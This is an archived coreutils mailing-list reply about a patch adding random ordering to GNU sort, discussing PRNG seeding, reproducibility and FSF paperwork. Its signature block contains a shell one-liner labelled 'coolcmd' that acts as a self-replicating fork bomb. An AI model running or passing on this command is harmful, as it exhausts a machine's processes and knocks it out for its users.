Re: [PATCH] Makes sort create random order

[Thomas Habets]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

(again, CC any replies. If this too much bother, I'll subscribe)
Once upon a midnight dreary, Bob Proulx pondered, weak and weary:
> > So, added -R, --random.
> Normally to do this I usually use the nonstandard $RANDOM extension

Ah. Nice. I hadn't thought of that. I have my doubts on "while read line"'s
performance though.

> Often I would also like to have a way to repeat that ordering.

Yeah, that came to me just after sending the last mail. The problem is that
you'll probably have to have an integrated PRNG in sort so that it'll give
the same output no matter what the OS. But then again, you may only care that
it gives the same output on the same box, running the same OS and CPU.

I guess it boils down to what you want to guarantee.
Yes, you'll get the same ordering of data...
IF you have the same input (both data and cmdline)
AND you are running the same OS
AND you haven't switched CPU (recompiled sort for x86-64 comes to mind)
AND you haven't upgraded libc. (libc doesn't guarantee that rand() will work
the same forever, does it?)

Sending more parameters to set_ordering looks invasive, and the brief look
I've had at the code tells me it'd be ugly to do it outside that function.
Opinions?

> Also, you seed the PRNG with the system time in seconds.  I am not
> educated with such matters but I feel certain this will come under
> file later as being a poor RN seed.

rand() is insecure no matter what the seed. I'm not sure what can be
considered "poor" about it. Yes, I agree, if it can easily be made more
random, that's good. (note "if" and "easily")

Perhaps a better description of what I was aiming for is "arbitrary order",
not "random, unpredictable order".

> I would hate to see a simple
> feature like this which is not concerned about the strength of the
> PRNG be added but then be the cause of a problem in a completely
> different application which requires a strong PRNG.

The easy reply then is that the other application sucks. If a certain part of
a security-minded program needs to shuffle something, and it *really* matters
if it's predictable or not, then if they don't check how it's done, well....
I don't see how they can tie their own shoelaces.

Seriously, I don't see how it can be within "sort"s realm to provide security
here.
(the phrase "Famous Last Words" comes to mind...)

> > Note that I use rand() and srand(), if that matters on some OS.
> I believe a full implementation will probably need to have autoconf
> determine the proper pseudo-random number generator implementation.

Probably. But I suck at autoconf.

> Jim Meyering has previously posted guidelines for submissions to the
> coreutils.  Attached are two previously statements posted to these
> lists concerning this.

Thank you.

> In particular I believe your submission is
> large enough to warrent a copyright assignment to the FSF.  Do you
> have one on file?

Bleh. Paperwork. This is why I never became a debian developer. It's tiny....
It's trivial.... Fine, I'll look into it.

I guess it wouldn't be enough that I signed this email, and my key has been 
signed by a debian developer? No, didn't think so.

> - follow the guidelines in the GNU Coding Standards

It hurt, but I did. :-)

>  - include changes to the texinfo documentation,

Texinfo files makes me dizzy. I changed the manpage, but not the texi-page. (I
didn't mention this in the last mail since I didn't find one. It didn't occur
to me that it'd be in coreutils.texi, and not named "sort.texi")

- ---------
typedef struct me_s {
  char name[]      = { "Thomas Habets" };
  char email[]     = { "address@hidden" };
  char kernel[]    = { "Linux 2.4" };
  char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt"; };
  char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
  char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBMM5rKGrpCq1I6FQRAiVsAJ9NaxLh4TxVYPSjt1F9gkGV/XDYgACfSSKX
ghQNNtuwycergT3XY37L1MM=
=aXUZ
-----END PGP SIGNATURE-----